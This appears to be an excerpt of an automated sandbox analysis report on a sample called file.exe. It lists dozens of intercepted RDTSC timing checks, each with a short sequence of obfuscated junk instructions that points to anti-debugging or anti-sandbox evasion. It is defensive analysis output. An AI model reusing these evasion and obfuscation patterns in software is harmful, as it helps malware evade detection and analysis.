                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C09A9 second address: 12C09CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5CB8E4DD9Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C09CD second address: 12C09D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1BB9 second address: 12C1BCB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1BCB second address: 12C1BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1BCF second address: 12C1BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4DB7 second address: 12C4DCF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5CB8E4899Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4DCF second address: 12C4DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1BD3 second address: 12C1BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C50D7 second address: 12C5117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5CB8E4DD96h 0x00000009 jg 00007F5CB8E4DD96h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F5CB8E4DDA8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5CB8E4DDA2h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB46C second address: 12CB508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jnc 00007F5CB8E4899Ch 0x0000000e jne 00007F5CB8E48998h 0x00000014 popad 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F5CB8E48998h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 call 00007F5CB8E489A9h 0x00000035 jmp 00007F5CB8E4899Dh 0x0000003a pop edi 0x0000003b push 00000000h 0x0000003d mov edi, ebx 0x0000003f add dword ptr [ebp+122D2884h], edi 0x00000045 push 00000000h 0x00000047 mov dword ptr [ebp+122D1C00h], edi 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f jmp 00007F5CB8E4899Ah 0x00000054 pop eax 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F5CB8E489A2h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB508 second address: 12CB50E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB50E second address: 12CB512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB512 second address: 12CB516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC639 second address: 12CC68E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4899Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1AC1h], ecx 0x00000010 push 00000000h 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F5CB8E48998h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f xor bl, FFFFFFE6h 0x00000032 push eax 0x00000033 pushad 0x00000034 jne 00007F5CB8E4899Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c ja 00007F5CB8E48996h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC7ED second address: 12CC80F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F5CB8E4DD9Ch 0x00000010 popad 0x00000011 push eax 0x00000012 jg 00007F5CB8E4DDA8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD7CF second address: 12CD7E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC80F second address: 12CC813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD7E7 second address: 12CD7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC813 second address: 12CC817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF81D second address: 12CF823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D05C4 second address: 12D05D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5CB8E4DD9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF823 second address: 12CF827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D05D7 second address: 12D0672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F5CB8E4DDA1h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F5CB8E4DD98h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jmp 00007F5CB8E4DDA3h 0x0000002d mov ebx, dword ptr [ebp+122D2A7Ch] 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D381Dh] 0x0000003b jmp 00007F5CB8E4DDA2h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F5CB8E4DD98h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c push eax 0x0000005d pushad 0x0000005e push esi 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0672 second address: 12D067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007F5CB8E4899Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D15A1 second address: 12D15A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D172E second address: 12D1733 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D1733 second address: 12D17A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F5CB8E4DDA2h 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+1244D97Bh] 0x00000015 sub edi, dword ptr [ebp+122D3A79h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov edi, esi 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov ebx, dword ptr [ebp+122D3A9Dh] 0x00000031 mov eax, dword ptr [ebp+122D0225h] 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F5CB8E4DD98h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 mov di, 72A1h 0x00000055 push FFFFFFFFh 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b jnl 00007F5CB8E4DD96h 0x00000061 pop eax 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D17A3 second address: 12D17C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5CB8E489A4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D3550 second address: 12D355B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D355B second address: 12D355F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D355F second address: 12D3563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5B99 second address: 12D5B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5B9D second address: 12D5BA7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D6AE2 second address: 12D6AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D6AE6 second address: 12D6AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5E20 second address: 12D5E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D7C39 second address: 12D7C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D7CDC second address: 12D7CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D7CF7 second address: 12D7CFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D9CC2 second address: 12D9CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D9CC6 second address: 12D9CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D7E2C second address: 12D7E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F5CB8E4899Ch 0x0000000b jnc 00007F5CB8E48996h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D9CCA second address: 12D9CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5CB8E4DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D7E45 second address: 12D7E5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D9CD6 second address: 12D9CDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D9CDB second address: 12D9CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DB45F second address: 12DB464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DA5C0 second address: 12DA5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5CB8E48996h 0x00000009 jnl 00007F5CB8E48996h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DA5D9 second address: 12DA5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DB464 second address: 12DB4E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jne 00007F5CB8E48996h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F5CB8E48998h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D390Dh] 0x00000031 mov edi, dword ptr [ebp+122D3865h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F5CB8E48998h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+122D3A21h] 0x00000059 push 00000000h 0x0000005b sbb bh, 00000073h 0x0000005e xchg eax, esi 0x0000005f jng 00007F5CB8E489A0h 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DA5E2 second address: 12DA5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DB4E1 second address: 12DB4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC752 second address: 12DC756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC756 second address: 12DC75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E7FB0 second address: 12E7FDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DD9Fh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F5CB8E4DDA7h 0x00000011 jmp 00007F5CB8E4DDA1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E7FDC second address: 12E7FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E7FE2 second address: 12E7FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 127EE72 second address: 127EE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E489A8h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 127EE91 second address: 127EE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E780F second address: 12E7815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E7955 second address: 12E7959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E7959 second address: 12E7973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F5CB8E489A1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12ECF39 second address: 12ECF3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12ECF3D second address: 12ECF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12ED159 second address: 12ED177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jl 00007F5CB8E4DDA0h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12ED177 second address: 12ED1A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F5CB8E489A4h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5CB8E4899Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F2BD1 second address: 12F2BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F32F2 second address: 12F3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3306 second address: 12F3341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F5CB8E4DD96h 0x0000000c jmp 00007F5CB8E4DD9Fh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F5CB8E4DDA9h 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3482 second address: 12F348A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F348A second address: 12F34AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5CB8E4DD96h 0x0000000a popad 0x0000000b pop esi 0x0000000c push ecx 0x0000000d js 00007F5CB8E4DD9Eh 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007F5CB8E4DD96h 0x0000001b js 00007F5CB8E4DD9Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F35F4 second address: 12F35F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F35F8 second address: 12F360F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F360F second address: 12F3615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3615 second address: 12F3619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3619 second address: 12F365D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5CB8E489A5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5CB8E489A5h 0x00000013 push edx 0x00000014 jmp 00007F5CB8E4899Fh 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F365D second address: 12F3694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5CB8E4DD9Dh 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007F5CB8E4DD96h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5CB8E4DD9Eh 0x0000001a jmp 00007F5CB8E4DD9Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12808BC second address: 12808E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5CB8E48996h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F5CB8E489A7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12808E0 second address: 1280915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5CB8E4DDA0h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5CB8E4DDA2h 0x00000013 jmp 00007F5CB8E4DD9Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FB553 second address: 12FB557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C81F8 second address: 12A6CD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5CB8E4DDA8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c lea eax, dword ptr [ebp+12489F39h] 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F5CB8E4DD98h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov cl, E8h 0x0000002e jmp 00007F5CB8E4DDA9h 0x00000033 mov ecx, dword ptr [ebp+122D39D5h] 0x00000039 nop 0x0000003a pushad 0x0000003b pushad 0x0000003c jmp 00007F5CB8E4DDA6h 0x00000041 jmp 00007F5CB8E4DDA9h 0x00000046 popad 0x00000047 push edi 0x00000048 pushad 0x00000049 popad 0x0000004a pop edi 0x0000004b popad 0x0000004c push eax 0x0000004d jmp 00007F5CB8E4DDA4h 0x00000052 nop 0x00000053 mov dx, 304Bh 0x00000057 push edx 0x00000058 mov edx, dword ptr [ebp+1247B3FCh] 0x0000005e pop ecx 0x0000005f call dword ptr [ebp+122D19F4h] 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F5CB8E4DD9Eh 0x0000006d rdtsc
